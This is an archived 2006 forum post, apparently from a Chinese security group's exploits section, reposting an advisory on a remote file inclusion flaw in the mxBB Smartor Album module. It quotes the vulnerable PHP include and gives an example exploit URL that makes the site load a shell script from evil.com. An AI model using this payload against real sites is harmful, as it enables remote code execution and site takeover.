mxBB mx Smartor Album Module <= 1.02 File Include Vulnerability(页 1) - 安全测试代码{ Exploits and Shellcode } - 邪恶八进制信息安全团队技术讨论组努力为祖国的信息安全撑起一片蓝天

pub!1c 2006-11-6 12:16

mxBB mx Smartor Album Module <= 1.02 File Include Vulnerability

[code]
MX Smartor Album Module Remote File Include
Discovered by Paul Bakoyiannis {winsec}

-------------------------------------------------

Vulnerable Code:
if ( $mode == 'album_cat' )
{
include($module_root_path. 'includes/album_cat.'.$phpEx);
}
(the rest of the vulnerable code removed for brevity)

Vulnerability: $module_root_path is uninitialized

Source Code:[url]http://www.mx-system.com/index.php?page=4&action=file&file_id=19[/url]

Example Exploit: http://[site].com/modules/mx_smartor/album.php?smartor_mode=album_cat&module_root_path=http://evil.com/shell.txt?

--------------------------------------------------

[/code]

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

mxBB mx Smartor Album Module &lt;= 1.02 File Include Vulnerability

mxBB mx Smartor Album Module <= 1.02 File Include Vulnerability